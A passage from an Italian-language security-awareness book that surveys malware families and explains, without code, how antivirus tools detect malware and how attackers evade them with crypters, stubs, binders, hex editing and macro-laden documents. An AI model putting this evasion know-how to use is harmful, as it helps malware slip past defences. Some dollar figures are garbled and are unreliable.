capacità di replicarsi, così invece di inviare una sola copia di sé stesso, può
inviarne centinaia.

I metodi con cui il Worm infetta altri computer possono essere

molteplici, sfruttano vulnerabilità di basso livello nel sistema, colpendo i
software presenti sul sistema facendo leva su buffer overflows,
manipolazione delle stringhe, errori nella memoria e via discorrendo, in
sostanza le fasi che segue il Worm per diffondersi in un sistema sono:

1) Inietta il suo codice nel codice di un programma benigno, come per

esempio Word.

2) Manipola il codice benigno affinché questo si comporti in un modo

diverso da quello originario.

3) Corrompere i dati e i file che gestisce quel programma, nel caso di

Word, trasformare tutti i file DOC del sistema in Malware.

Una volta che il computer del malcapitato è infettato dal Worm,

quest’ultimo passa alla seconda fase del piano, ossia inviarsi ed infettare più
persone possibile, in genere vengono utilizzati degli scanner per scrutare la
rete del computer infetto e colpire qualsiasi computer vulnerabile, ma spesso
il Worm non si limita solo alla rete locale, ma utilizza i computer delle
vittime come veri e propri scanner di massa, utilizzano Google e altri motori
per ricercare siti web con server vulnerabili, e il ciclo continua fin quando
non vengono identificati e bloccati.

I Worm moderni utilizzano un codice polimorfo, ossia ogni volta che si

riproducono il loro codice binario cambia, rendendo difficoltosa la loro
identificazione da parte degli antivirus, in più vengono allegati ad altri tipi di
Malware per aumentare il loro raggio d’azione.

Mydoom fu uno dei Worm che non si possono dimenticare, non venne
allegato a nessun Malware ma la sua distruzione fu comunque notevole, ben
38,5 bilioni di danni e alcune varianti del Worm sono attive ancora oggi.

Le versioni di Mydoom sono tante e ognuna ha una sua funzione, ma la

cosa che accumuna tutte le varianti è che il Worm si propagava tramite email
fingendosi un messaggio inviato non andato a buon fine, con dentro un
allegato che una volta cliccato, si replicava utilizzando tutti i file possibili per
assicurarne la sopravvivenza.

Una delle cose curiose che contraddistinguono questo Worm, è la

presenza di una scritta stesso nel codice che cito “andy; I'm just doing my
job, nothing personal, sorry” di fatto l’originale creatore del virus non è stato
mai identificato, ma si pensa da questa linea di testo trovata, che il Worm sia
stato commissionato ad una persona estremamente competente in materia e
poi messo in circolazione.
Adware

Questo tipo di Malware viene utilizzato dagli hacker per infettare la macchina
e mostrare al malcapitato della pubblicità invasiva, non causano grandi danni
ma possono essere molto fastidiosi perché quasi sempre il loro bersaglio
primario è il browser predefinito.

Gli Adware possono presentarsi in varie forme, attraverso le classiche

toolbar indesiderate, la comparsa di pubblicità su siti che visitiamo
giornalmente, la disattivazione di plug-in del browser che bloccano la
pubblicità e la manomissione dei risultati di Google, inoltre quando abbiamo
un Adware installato sul nostro computer, permettiamo all’hacker di
mostrarci qualsiasi tipo di advertising pubblicitario, può farci cliccare,
scaricare o visualizzare qualsiasi tipo di contenuto e se riesce ad infettare
molte persone, può iniziare a guadagnare cifre non indifferenti, possiamo fare
questo esempio.

Shareacash è uno dei tanti siti dove è possibile essere pagati per il
numero di download che si genera, questo tipo di servizio si chiama Pay Per
Download, ed è possibile guadagnare da $1 a $20 in base alla tipologia di
traffico che viene inviato.

Teniamo conto inoltre che spesso gli Hacker uniscono un Worm ad un

Adware per infettare molte più persone, mettiamo il caso il malintenzionato
riesce ad infettare 3000 persone in un mese, se ogni giorno l’Adware scarica
un file al giorno oppure compila un sondaggio autonomamente, si possono
arrivare facilmente a guadagnare queste cifre:

3000 * $8 = $24,0000
 Visto che questo tipo di attività non sono tollerate dai gestori di questo
tipo di siti, nel 90% dei casi prima o poi l’account del hacker viene terminato
ed è costretto a passare ad un altro servizio o creare una seconda identità
falsa.

Inoltre sono classificati come Adware anche i plug-in del browser che
aggiungono informazioni o risultati alla ricerca di Google, molto spesso per
rimuoverli basta disabilitare il plug-in, mentre in altri casi può essere un
problema molto più serio.

Purtroppo anche i nostri cellulari possono essere soggetti ad Adware, è

facile essere infettati scaricando applicazioni gratuite su Android e IOS,
specialmente su Android.

Sono presenti su internet dei software che ti permettono di creare la tua

rete di Adware personalizzata, con prezzi che partono dal pacchetto base,
ossia 5,000 dollari a 30,000 dollari per licenze estese, e dato i lauti guadagni
derivanti da quest’attività la cifra proposta non rappresenta un grosso
ostacolo per chi è interessato.
Trojan / R.A.T

Il Trojan è il Malware più utilizzato dai dilettanti o da chi ha voglia di

divertirsi, in genere si utilizza per avere completo accesso al computer della
vittima, per poi spiare la Webcam, visualizzare file e cartelle, riprodurre
audio, in pratica quasi tutto quello che si può fare al PC, l’hacker può farlo
seduto comodamente da remoto.

Il Trojan per me è in assoluto il Malware più pericoloso a livello di

privacy in quanto se vieni infettato da un hacker serio, può continuare a
spiarti per mesi tramite webcam, vendere le tue immagini, i tuoi dati ed infine
leggere tutto quello che scrivi…può persino ascoltare tramite microfono
quello che dici.

Dico hacker serio, perché in genere chi è alle prime armi può divertirsi a
spegnere il computer, aprire il vano CD e tutte queste stupidaggini, se si
comporta in questo modo sarà facile per noi identificare l’infezione e
rimuoverla, questo lo vedremo più avanti.

Un Trojan è formato da 2 parti, un client ed un server, il client è quello

che utilizza l’hacker per controllare il computer, mentre il server è il file che
viene generato stesso dal client e deve essere inviato alla vittima, una volta
cliccato da quest’ultima, l’hacker può avere pieno accesso al sistema.

Una volta che il server viene eseguito, il computer della vittima genera
una connessione in uscita e si collega immediatamente al client, scavalcando
antivirus e firewall, dopodiché l’Hacker può fare tutto quello che vuole,
mentre la vittima non ne ha nessuna idea.

Spesso una volta che l’Hacker ha infettato la vittima con un Trojan,

cerca di aprirsi altre vie d’ingresso (rootkit) nel caso l’Antivirus dovesse
identificare il Malware in un futuro aggiornamento, ed è sicuro che avverrà
prima o poi, inoltre cerca di infettare tutti i computer della rete per aumentare
il suo controllo, questo in un’ottica aziendale, sarebbe davvero un bel
problema.

I Trojan di oggi sono molto sofisticati, posseggono funzionalità che

anni fa erano impensabili, vediamo un po’ di storia.

Com’erano i Trojan prima

Ricordo ancora SubSeven, uno dei primi Trojan su cui ho messo le

mani, non facevo altro che cercare di decompilare il codice per scrutare un
po’ nella mente del creatore.

Questo tipo di Trojan, aveva un modo di collegarsi alla vittima diverso

da quello attuale, e si basava sul fatto che i firewall di allora, non erano
particolarmente avanzati, in pratica quando la vittima eseguiva il server,
automaticamente quest’ultimo apriva la porta utilizzata dal client per mettersi
in contatto con il server, quindi per collegarsi alla vittima serviva il suo ip, ed
esistevano vari modi per procurarselo.

PHP Logger: Questo metodo era all’epoca il più complesso da implementare

per i meno esperti, ogni volta che la vittima tornava online, il server si
collegava ad un server FTP e scriveva l’ip della macchina su un file di testo,
in modo che l’hacker potesse comodamente entrare nel server FTP di sua
proprietà, copiare e incollare l’ip nel trojan, ed avere accesso al computer.

Uno dei lati negativi di questo sistema, è che non c’era nessuno tipo di
avviso, era necessario controllare spesso il file di testo per vedere se il server
aveva fatto il suo lavoro

Email: Farsi arrivate l’indirizzo ip della vittima comodamente nella propria

email era uno dei sistemi più usati, ogni trojan aveva la possibilità di
specificare, un’email e il server SMTP per inviare correttamente l’email.

Notifica ICQ: Alcuni Trojan possedevano questa particolare funzionalità,

ogni volta che una vittima si collegava a internet, il server inviava una
notifica tramite messaggistica istantanea che rendeva immediato il
collegamento con la vittima, esistevano anche degli script in Python per
automatizzare il processo e collegarsi senza copiare ed incollare l’ip
manualmente e cliccare connetti.

Una delle cose più scoccianti per gli hacker, è che anni fa non tutti
rimanevano 24 ore su 24 su internet, quindi la vittima si collegava per
qualche minuto e poi terminava la sessione, l’hacker in quel limitato lasso di
tempo, doveva trovare tutte le informazioni possibili, in più all’epoca c’era il
56k, quindi internet era molto lento, di conseguenza i trojan a volte si
bloccavano e non erano sempre stabili come adesso, inoltre era impossibile
scaricare qualsiasi tipo di file.
Come sono i Trojan adesso

Ora i trojan, specialmente quelli più sofisticati, posseggono delle

funzioni impensabili se li paragoniamo a quelli che esistevano anni fa, ma il
cambiamento più significativo è stato il metodo di connessione alla vittima,
ora non è più l’hacker che si collega alla vittima, ma il contrario.

In pratica quando il server viene eseguito dalla vittima, crea una

connessione in uscita su una determinata porta su un determinato ip, l’hacker
per collegarsi, non deve far altro che mettere in ascolto quella porta sul suo ip
per far sì che la vittima si colleghi a lui, in questo modo si possono avere 100
– 10.000 vittime assieme senza nessun problema di organizzazione.

Ma questo anche se è stato un cambiamento significativo, non è l’unico,

ci sono alcune funzioni sulle quali vorrei soffermarmi e spiegare nel
dettaglio:
Reverse Socks5: I socks sono un tipo di protocollo che conferiscono
anonimato a chi li usa, vengono usati per rendere sicure le comunicazioni e
per nascondere la propria posizione, di solito per operazioni di bassa entità
basta utilizzarne uno, ma qui arriva la parte interessante.

Il RS è uno strumento che permette all’hacker di utilizzare l’ip della

vittima per navigare e rimanere anonimo, se durante l’uso di questo Socks,
l’hacker dovesse compiere un’azione illegale, tutte le tracce porterebbero di
fatto alla vittima, questa la rende una pratica estremamente pericolosa per chi
la subisce, la cosa cambia se si usano più socks assieme.
L’hacker per garantirsi un’anonimità estrema, utilizza più vittime
assieme per generare una vera e propria rete di proxy, la connessione sarà
lenta ma il grado di anonimato decisamente più alto.

RPD Manager: Questa è una delle funzionalità più rivoluzionarie degli

ultimi anni, RPD sta per “Remote Desktop Protocol” e permette all’hacker di
aprire una sessione secondaria sul computer della vittima, questo significa
che potrà interagire con la macchina infetta, senza che il proprietario se ne
accorga, di solito viene utilizzato per includere il proprio Malware
nell’antivirus di sistema, in modo che lo riconosca come sicuro e non venga
mai rimosso, ma gli usi sono davvero infiniti.

Anti-Malware: Da quando un famoso trojan di nome BlackShades fu

bloccato dall’FBI, tutti i programmatori di trojan a pagamento hanno dovuto
tutelarsi specificando che il loro prodotto non era inteso per scopi illegali, ma
per controllare i propri computer da chi li usa, quindi hanno incluso
funzionalità come questa, ma in realtà viene utilizzato per proteggere le
vittime da altre infezioni, in modo da essere gli unici ad avere accesso al
computer.

L’Hacker per aumentare i suoi profitti installa Adware ed un altro tipo

di Malware che vedremo più avanti che gli permette di utilizzare la potenza
del computer per generare di Bitcoin.

Molti non sanno che quando si viene infettati, la vittima viene

denominata “slave” e molto spesso, per guadagnarci qualcosa, viene venduta
al miglior offerente su alcuni forum underground, se si tratta di donne il
prezzo sale, perché ci sono molti interessati a spiarle tramite Webcam, o
leggere le conversazioni.

È davvero inquietante, ma purtroppo sono cose che succedono ed è

necessario saperle per aumentare la propria consapevolezza e sicurezza.
Keylogger

Il Keylogger è un programma che una volta installato sul computer della

vittima, permette di venire a conoscenza di tutti i tasti digitati sulla tastiera,
password e dati bancari compresi, in base al tipo di Keylogger scelto,
l’Hacker può farsi arrivare i dati della vittima su:

- Email
- Spazio Web FTP
- File PHP

Il funzionamento di un Keylogger software è abbastanza elementare,

sono facili da usare e per questo rappresentano il Malware più usato da chi
inizia a mettere piede nel mondo dell’hacking.

Ma oltre i Keylogger software, esistono anche dei veri e propri

Keylogger Hardware che si attaccano dietro la porta USB o PS2 del tuo
computer.
 Questo tipo di Keylogger è scelto prevalentemente dagli Hacker per
effettuare furti di dati ad aziende, dove magari puoi sederti alla scrivania con
un consulente, aspettare che si allontani a fare delle fotocopie ed attaccare
rapidamente il Keylogger hardware al computer, cosa più importante è che il
malintenzionato non deve tornare a prendere il Keylogger per vedere i tasti
digitati, molti di questi arnesi si collegano automaticamente alla rete Wi-Fi o
lan del pc e inviano i log per email all’hacker.

Molte volte mi sono trovato presso gli uffici delle poste a chiedere
informazioni, chiuso in una stanza con la consulente, che durante il colloquio
si alzava e andava a fare le fotocopie lasciando il computer completamente
incustodito.

Ogni struttura aziendale dovrebbe prendere in seria considerazione

questo pericolo, specialmente quando sono in gioco dati personali e soldi di
altre persone.
Se vuoi approfondire l’argomento e vedere da vicino come funzionano
questi strumenti, sono disponibili su Amazon.it sopra i €50, mentre per le
versioni con Wi-Fi integrato, il prezzo sale.

In genere viene utilizzato per monitorare il rendimento dei dipendenti di

un’azienda, oppure installato sul proprio computer per vedere se qualcuno lo
usa senza la tua autorizzazione, ma personalmente per svolgere questo tipo di
operazioni è consigliato utilizzare un Keylogger software.
Bitcoin Miner

Questo tipo di Malware è relativamente nuovo sulla scena, prima di spiegare

cosa sono voglio darti una breve introduzione sui Bitcoin in quanto li
vedremo meglio più avanti.

In pratica il Bitcoin è la più famosa delle valute digitale e in quanto tale

non è regolamentata da nessuno organo governativo o privato come per
l’Euro, per quanto riguarda la nostra moneta, quando si devono stampare i
soldi, è la banca centrale che li stampa e li distribuisce.

Per i Bitcoin la cosa funziona diversamente, per guadagnarli, basta

utilizzare la CPU/GPU (Potenza) del proprio computer per risolvere problemi
matematici, e ogni volta che un problema viene risolto, il “miner” ossia la
macchina che genera i Bitcoin, viene ricompensata con una quantità di
Bitcoin direttamente proporzionale ai problemi matematici risolti.

Tempo fa era possibile, data l’estrema facilità dei problemi, generare

una discreta quantità di Bitcoin con un solo PC, ma ora che molte più persone
ne sono a conoscenza ed hanno iniziato a “minare” (generarli) questa
operazione richiede molta più potenza, perché i problemi diventano sempre
più complessi.

Questo succede perché se il sistema vede che troppe persone stanno

generando Bitcoin, automaticamente aumenta la difficoltà dei problemi, e per
risolversi servono dei computer sempre più potenti.

Gli hacker data questa crescente difficoltà hanno creato dei Bitcoin
Miner, ossia un Malware che una volta installato sul computer della vittima,
utilizza la potenza del suo computer per minare Bitcoin 24 ore su 24.
 Se per esempio l’Hacker avesse installato il Bitcoin Miner a 2,000
persone, approssimativamente guadagnerebbe €100 euro al giorno in Bitcoin,
questo calcolo è estremamente relativo, dipende tutto dalla potenza del
computer delle persone infettate.

È possibile per l’hacker minare anche altre valute digitali, che essendo
meno utilizzate è più facile ricavarne profitto da meno persone infettate.

Molto spesso scelgono di utilizzare solo il 10-20% della CPU in modo

da non dare troppo nell’occhio e non far bloccare il computer della vittima,
ecco un esempio di come appare un’infezione:

Inoltre il bersaglio preferito per questo genere di Malware, sono le

persone che hanno computer con schede grafiche potenti, perché la GPU è
molto più potente della CPU in termini di resa.

In genere se un hacker ha avuto accesso ad un sistema con un Trojan,

molto probabilmente caricherà un Bitcoin Miner nel PC della vittima per
aumentare i suoi profitti.
Ransomware

Questo tipo di Malware ha visto la sua esplosione nel 2013 ed è previsto che
la minaccia continuerà ad espandersi fino al 2017, il suo obiettivo è criptare i
file all’interno del computer e indurre il proprietario a pagare per riavere i
suoi file indietro e poter usare di nuovo il computer, non consiglio
assolutamente di pagare, anche perché molti che l’hanno fatto, non hanno
comunque ricevuto i loro file indietro.

In genere il Ransomware viene unito ad un Worm per essere diffuso, in

modo che possa colpire più persone possibile, replicarsi e auto inviarsi a tutti
i contatti della email o social network.

Questo Malware quando infetta il computer non si presenta subito,

infatti prima scannerizza le directory del nostro pc, cripta dei file e solo dopo
aver compiuto tutti passaggi, si manifesta e chiede il riscatto, eccone un
esempio che mi è capitato ultimamente di dover risolvere:
 Una cosa fondamentale da sapere è che questo Cripto Malware ha una
struttura simile ad un Virus, il formato preferito di distribuzione è .exe e non
ha la facoltà di eseguirsi da solo, ma solo attraverso interazione umana.

Nel 99% dei casi anche se si elimina il Malware non è possibile

recuperare i file bloccati, in quanto sono criptati con chiave univoca e solo
chi conosce l’algoritmo di cifratura e la password può decriptare.

Per me il peggiore Ransomware che mi è capitato di vedere

ultimamente si chiama Locky, oltre a criptare i comuni file di sistema, ha una
propensione per infettare l’intero network e cripta le chiavi segrete dei
portafogli bitcoin ed eventuali backup di sistema, in modo che la vittima non
può utilizzarli per reimpostare il sistema.

Inoltre elimina tutti i punti di ripristino del sistema, in pratica l’unico

modo per sbarazzarsi di locky, è staccare il pc infetto dalla rete locale il
prima possibile e formattare.
Stealers

Questi sono un tipo di Malware molto comune, il loro unico scopo è rubare
tutte le password salvate nel tuo computer e inviarle via email o caricarle
sullo spazio FTP dell’hacker, in genere vengono rubate tutte le password che
scegliamo di far ricordare al browser, spuntando la casella “Ricorda la
Password”, questo è un esempio di Stealer:

Come possiamo vedere per l’Hacker è possibile selezionare tutti i

browser e le applicazioni dalle quali vuole estrarre le password ed inviarle
direttamente ad un file php, che le conserverà in un database per un facile
accesso.

Se volessi provare a scaricare questo tipo di programmi gratis su

internet, posso dirti che il 99% di questi sono a loro volta infetti, chi si
avvicina all’hacking spesso è così che prende la prima infezione.
 Cercando bene su internet e nei vari forum underground è possibile
acquistare strumenti di questo genere a buon prezzo e completamente
invisibili a qualsiasi AV, in ogni caso, non scaricare mai programmi di questo
genere se non dai siti ufficiali, ovviamente solo a scopo educativo o per
monitorare il tuo computer.
Botnet

Questo è il tipo di strumento che utilizzano gli hacker, in questo caso gli
Anonymous per crashare e mandare offline i server, è possibile definire una
botnet come un punto dove convergono tutte le vittime che l’hacker può
gestire comodamente con un pannello, viene spesso associato ad altri
Malware per aumentarne la distribuzione, vengono definiti spesso come
trojan più sofisticati.

Una volta che questo tipo di Malware viene eseguito su un computer,

automaticamente questo diventa parte di una rete di bot, che l’hacker può
utilizzare per effettuare attacchi ddos, ossia convergere tutte le vittime della
botnet su un solo obiettivo con l’intento di far andare in crash il server.

Sono disponibili sul mercato due tipi di Botnet, quella IRC e quella
http:

IRC: Gli hacker sfruttano il server del protocollo per chattare IRC e lo
utilizzano come punto di ritrovo per tutte le vittime, utilizza un pannello GUI
o un cmd per lanciare gli attacchi.

HTTP: Le Botnet di questo tipo in genere se acquistate sul mercato possono

valere 3,000 – 4,000 mila dollari. Sono molto cari perché danno la possibilità
di contenere molte più vittime, è molto più efficace e di solito sono molto più
avanzati.

In genere rendersi conto di essere infetto è difficile in quanto l’unico

metodo che abbiamo per rendercene conto, sono degli improvvisi
rallentamenti di connessione, o nella maggior parte dei casi, non c’è nessun
sintomo apparente.
 Una delle Botnet più letali degli ultimi anni, dove alcune varianti sono
ancora oggi attive e continuano ad infettare ignari utenti è Conficker.

Si stima che nei suoi anni di gloria, ossia tra il 2008 e il 2009, sono stati
infettati oltre 7 milioni di computer, tra cui varie agenzie governative come il
Ministro della Difesa U.K, Navi da guerra e sottomarini della Royal Navy e
alcune sezioni dell’ambasciata militare Francese.

Oggi il rischio maggiore per le Botnet risiede nei dispositivi mobile,

ormai esistono varie varianti per infettare sistemi IOS e Android, data la
bassa frequenza di aggiornamenti per questo tipo di dispositivi, sono spesso il
bersaglio preferito per effettuare spionaggio aziendale o semplice furto di
dati.
Wallet Stealer

Questo tipo di Malware sta per diventare molto famoso, non è ancora molto
utilizzato perché non ci sono ancora moltissime persone che acquistano e
detengono Bitcoin o altre forme di moneta digitale.

Il Malware in questione non fa altro che rubare tutti i Bitcoin o altre

valute che l’utente tiene nei portafogli digitali e dato che i Bitcoin sono una
forma di pagamento totalmente anonima, una volta che si subisce il furto è
quasi impossibile risalire a chi sono stati inviati i Bitcoin.

La metodologia che segue questo Malware è cercare il file “wallet.dat”

nel computer (spesso nella directory appdata) e caricarlo su un server FTP
dove l’hacker può averne accesso ed eventualmente rubare tutte le monete
virtuali.
Ma ne esistono anche di più sofisticati che ogni volta che l’utente si
accinge ad effettuare un pagamento con i bitcoin, il Malware cambia
l’indirizzo del ricevente con quello del malintenzionato e si fa inviare la
moneta digitale.

Questo tipo di Stealer sarà il più pericoloso tra 10-15 anni, quando le
persone inizieranno ad usare frequentemente questo tipo di valuta, per adesso
i vari wallet online non hanno efficaci contromisure per contrastare questo
fenomeno, forse in futuro.

Questi sono tutti i tipi di Malware che gli hacker utilizzano per
danneggiare, espandersi, estorcere ed avere accesso a più sistemi possibile, in
questi anni mi sono sempre tenuto al corrente di tutte le nuove tattiche, per il
semplice motivo che mi guadagno da vivere lavorando online, devo essere
sempre preparato a qualsiasi evenienza, e anche tu dovresti, anche se usi il
computer come passatempo.

Nel prossimo capitolo vedremo come fanno gli Antivirus a proteggerci

dai Malware e perché non possiamo fare affidamento su di loro per restare al
sicuro.
 Capitolo 4: Il Funzionamento Degli Antivirus

Se intendiamo basare la nostra protezione sul tipo di Antivirus che scegliamo,

non faremo una bella riuscita, purtroppo non ne esiste uno che blocca tutti i
tentativi di infezione e non potrà mai esistere per un semplice motivo.

Gli Antivirus utilizzano principalmente due metodi per bloccare un

Malware appena entra nel sistema, il primo è quello più comune, consiste
nell’identificazione di stringhe di codice comunemente associate a
programmi maligni, in pratica ogni volta che un nuovo file viene scaricato sul
pc, l’AV lo controlla e lo passa attraverso uno scanner di codici, appena trova
un riscontro di un qualsiasi codice maligno, questo viene bloccato.

Questo è un esempio di quello che vedono gli AV:

È stata la prima funzione utile di un antivirus, in quanto questo metodo

permette di bloccare il Malware prima della sua esecuzione in memoria,
l’unico lato negativo è che il database deve essere continuamente essere
aggiornato e risulta difficile tenere il passo con tutte le minacce odierne.

Quando il nostro AV si aggiorna installa tutte le definizioni più recenti

per identificare ogni giorno nuovi Malware, ma dove li prende questi
aggiornamenti?
 Ogni volta che carichiamo un file eseguibile online, la compagnia
proprietaria della piattaforma dove stiamo caricando il nostro file (ie:
Facebook, Microsoft etc.…) in genere possiede accordi con le varie
compagnie di Antivirus che appena identificano un file sospetto, lo inviano
ad un reparto di analisi, e quando si accertano della presenza di un codice
maligno, lo isolano e lo mettono in coda per il prossimo aggiornamento.

C’è una diceria ormai conosciuta un po’ da tutti, le aziende che vendono
antivirus pagano hacker esterni per creare virus, diffonderli e dare loro il
sorgente per identificarlo prima della concorrenza, così facendo si
posizionano sul mercato come primi ad aver scoperto il Malware e
mantengono vivo il mercato della paura, niente di tutto questo è confermato.

Alcuni antivirus invece si fanno autorizzare per ispezionare il pc in

cerca di eseguibili sospetti da inviare ai propri tecnici per l’analisi.

Per eludere questo tipo di protezione, e fare in modo che il Malware

duri più a lungo prima di essere identificato dagli antivirus è stato inventato il
codice polimorfo,
Questo tipo di funzionalità è ormai presente nella maggior parte dei
Malware, in pratica questo cambia alcune stringhe del suo codice e le cripta
ogni volta in maniera diversa ad ogni file infettato, sono presenti anche forme
di polimorfismo più avanzate dove il Malware, quando infetta un secondo pc
o file, cambia completamente la sua struttura, come se fosse nuovo,
completamente diverso dal precedente.

Ed è qui che entra in gioco il secondo metodo con la quale gli AV

identificano un programma maligno, lo conosciamo in quanto è presente
ormai in tutti gli antivirus con il nome di metodo Euristico, e funziona
studiando e scannerizzando codici che potrebbero essere pericolosi per il
sistema, o controllando se un programma sta inviando dati in uscita.
 Purtroppo il metodo di identificazione Euristica è facilmente
scavalcabile da chiunque sappia programmare un Malware, per bypassare
questa protezione, bisogna impedire all’Antivirus di leggere il codice,
esistono varie tattiche anti-criptaggio che vengono utilizzare per arginare
questo sistema.

C’è da dire che gli AV sono dotati di uno strumento che si chiama
dissembler, che analizza il Malware provando vari metodi di decriptaggio,
una volta che il codice del Malware viene alla luce, l’hacker deve cambiare
metodo di criptaggio e ridistribuirlo.

La verità è che esistono metodi per arginare qualsiasi protezione, gli

Antivirus ci danno un senso di sicurezza come se fossimo protetti da qualsiasi
minaccia, ma la realtà è ben diversa.

Esistono gli 0-Day che sono un tipo di Malware quasi impossibile da

trovare, per esempio se io volessi programmare un trojan da zero, senza
utilizzare esempi già presenti in rete, potrei utilizzarlo per infettare specifici
obiettivi e gli AV potrebbero metterci mesi, se non anni a identificarlo.

Tralasciando gli 0-Day, ogni Malware prima o poi diventa visibile, non
importa quanto sofisticato e protetto possa essere.

Il primo passo per rafforzare le proprie difese, è rendersi conto che

quelle utilizzate finora non sono sufficienti, l’anello debole di un sistema, o
di un’attività, non è l’hacker, ma gli stessi impiegati, immagina un’azienda
composta da 100 persone, basta solo uno che scarica un file, un allegato di
posta che sembra un PDF e mette a repentaglio l’intera azienda.

Vediamo adesso come gli Hacker nascondono e rendono invisibili i

Malware agli Antivirus.
Capitolo 5: In Che Modo Gli Hacker Scavalcano Gli
Antivirus

Prima abbiamo visto come un Antivirus identifica un Malware, ora vediamo i

metodi più utilizzati dagli hacker per nascondere le loro stringhe maligne da
occhi indiscreti, prima di tutto devo specificare che se un Malware è stato
programmato da zero, probabilmente dato che è un codice nuovo non ci sarà
bisogno di nascondere il codice, mentre per utilizzare Trojan o altro Malware
già in circolazione, per bypassare gli AV è necessario:

Crypter

Criptare il Malware con programmi chiamati Crypter è il metodo in assoluto

più famoso ed efficace per rendere invisibile un programma nocivo al tuo
sistema.

Esistono due tipi di criptaggi, uno Runtime ed uno Scantime, per una
precisione maggiore:

- Scantime: L’Antivirus non è in grado di vedere il file quando è sul pc

ma solo quando l’utente lo clicca e si aggiunge o si inietta in uno dei processi
del sistema.

- Runtime: È un tipo ci criptaggio che permette agli AV di vedere il file

solo prima dell’esecuzione, dopodiché grazie all’oscurazione del codice
diventa invisibile.
Inoltre il Crypter per essere completo deve essere accompagnato da un
secondo file detto STUB, è un file exe o a volte dll, ed è suo compito rendere
eseguibile il file maligno e permettere di nasconderlo in Runtime, ecco
un’immagine che vale più di 1000 parole, questo è il percorso che fa il file
infetto quando viene criptato da un Crypter:

Lo stub funge anche da ulteriore schermo contro gli occhi degli

Antivirus, nella seconda immagine vediamo il procedimento che segue il file
una volta che l’utente lo esegue:
 Una volta che il Malware viene eseguito copia sé stesso in una directory
temporanea e inserisce un chiave di registro per essere eseguito
automaticamente ad ogni avvio del computer, molto spesso il Malware si
autodistrugge per evitare di essere in qualche modo rintracciato dalla vittima.

Se non hai mai visto un Crypter, sono più o meno così, differenziano
tutti in GUI (grafica) ma fanno la stessa cosa:
 Neanche i Crypter sono immuni agli occhi degli antivirus, difatti
possono passare diversi mesi prima che il file criptato diventi visibile, ma alla
fine tutti i file maligni come detto prima vengono scoperti.
Cambio Di Icona

Il cambio di icona è un altro metodo utilizzato dagli Hacker per rendere un

Malware invisibile, spesso molti di questi vengono riconosciuti dagli
Antivirus perché l’icona contiene una stringa che gli AV hanno già
immagazzinato per identificarlo, in questo caso si cambia l’icona per due
motivi

- Cambiare le stringhe malevole con alcune riconosciute come innocue.

- Cambiando l’icona si hanno più possibilità di cadere vittima dell’hacker
dato che il file sembra lecito.

Ecco un esempio di programma:

In genere quando vediamo un’icona troppo particolare o che non

abbiamo mai visto prima, c’è un buon 50% di possibilità che sia un file non
lecito.

Questo tipo di tecnica è ormai estremamente obsoleta, in quanto il

cambio d’icona è una funzione integrata di tutti i Crypter più moderni.
Binder

Questi programmi servono per unire il Malware ad un programma

secondario, in genere lo si usa per non far sospettare l’utente dopo aver
aperto il Malware, se sta scaricando un file convinto che sia uno screensaver
dei Pirati dei Caraibi, quando lo eseguirà si aprirà lo screensaver, ma anche il
Malware.

Questo è un esempio di programma, non è tra i più carini graficamente

però il concetto è quello.

Difficilmente sarà possibile rendere un file invisibile agli Antivirus con

questo metodo, in genere è uno strumento obsoleto che non viene più
utilizzato da solo, ma è incluso nei Crypter più moderni.
Hexing

Questo metodo non è molto usato perché è molto complesso ma allo stesso
tempo è 90 volte più efficace di un semplice cambio di icona, ma come
funziona?

In pratica prima abbiamo visto come fanno gli Antivirus ad identificare

un tipo di Malware, con questa tecnica si va a modificare direttamente le
stringhe che vengono lette dal AV.

Per fare questo l’hacker utilizza un Hex editor, se vuoi scoprire di che
programma si tratta, è lo stesso che ho usato prima per mostrarti le stringhe:

L’operazione è molto delicata perché se l’hacker non sa cosa sta facendo e

cambia solo lettere e numeri a caso, ci sono grosse possibilità che il Malware
smetta di funzionare.
Exploit exe to doc/pdf

Se credevi che i virus fossero solo in formato exe ora non è più così, nelle
comunità underground esistono degli exploit che possono utilizzare un file
word o pdf per creare un downloader che una volta che il documento viene
aperto e la macro eseguita, scarica il file maligno sul sistema.

Questo tipo di file sono invisibili agli occhi degli AV e una volta
cliccati aprono il documento di testo ma allo stesso tempo utilizzando le
macro, piazzano un file eseguibile in una cartella scelta al momento della
creazione del Malware e il sistema viene infettato.

Parlando della versione DOC, questo tipo di strategia funziona per tutti i
sistemi operativi Windows e su tutte le versioni di Microsoft Office fino alla
2016.

Reperire programmi del genere, ossia Crypter e exploit che trasformano

file exe in doc è estremamente facile, basti pensare che un Crypter che rende
un file invisibile agli AV costa sui 20 euro al mese, mentre un exploit
exe/doc, variano dai 30 ai 100, fino ad arrivare a 3,000 per quelli privati.

La maggior parte di questi exploit viene programmata in Python.

Se hai un dubbio su un file doc o pdf che hai ricevuto da una fonte
ignota, o anche nota, più avanti vedrai come potrai aprirlo senza mettere a
rischio il tuo sistema, se vuoi già avere uno strato di protezione, ti basta
bloccare l’esecuzione delle macro sul pacchetto Office.
RootKit

Il termine rootkit ha più di 10 anni, e viene da “root” che è il privilegio più

alto che è possibile acquisire in un sistema, è un “kit” che consiste in
programmi che aiutano l’hacker a mantenere l’accesso di root nel tempo.

In genere si uniscono ad altre forme di Malware per renderne la

rimozione un vero inferno, un Rootkit ha la capacità di iniettarsi in ogni
processo del task manager, infettare il bios e il processore per rendersi
completamente invisibile anche all’occhio esperto di un altro hacker.

Un Rootkit se avviato da un account amministratore, automaticamente

si unisce a qualsiasi cosa trovi e si nasconde persino dal task manager, mentre
se viene eseguito da un utente senza privilegi, utilizza degli exploit 0-day per
ottenere i privilegi di root (amministratore) e renderci la vita difficile.

Eliminare un Rootkit può essere molto complesso, a volte anche

impossibile se non si conosce bene il kernel del sistema dove si sta operando,
esiste uno strumento che utilizzo che vedremo più avanti, inoltre è possibile
cercare di eliminarlo manualmente ma niente è garantito in questi casi.

Per chi crede che Windows sia l’unico che può essere colpito da un
Rootkit, basti pensare che il primo è stato sviluppato per il sistema operativo
Linux ed esistono anche per MacOsx, di fatto il primo Rootkit ad essere
sviluppato per quest’ultimo risale al 2009.

È molto facile acquistare tutti gli strumenti giusti ed iniziare a infettare

e fare danni, ed è per questo che devi conoscere i principali canali di
distribuzione preferiti dagli Hacker per infettare le loro vittime, in modo che
tu possa prestare più attenzione ed evitare infezioni.
 Come vedi per gli Hacker non è difficile passare inosservati ed entrare
nel tuo sistema anche se il tuo Antivirus è aggiornato e pronto a far fuoco,
potrebbe non vedere l’obiettivo e di conseguenza la sua potenza di fuoco
diverrebbe inutile.
 Capitolo 6: Canali Di Distribuzione Più Utilizzati

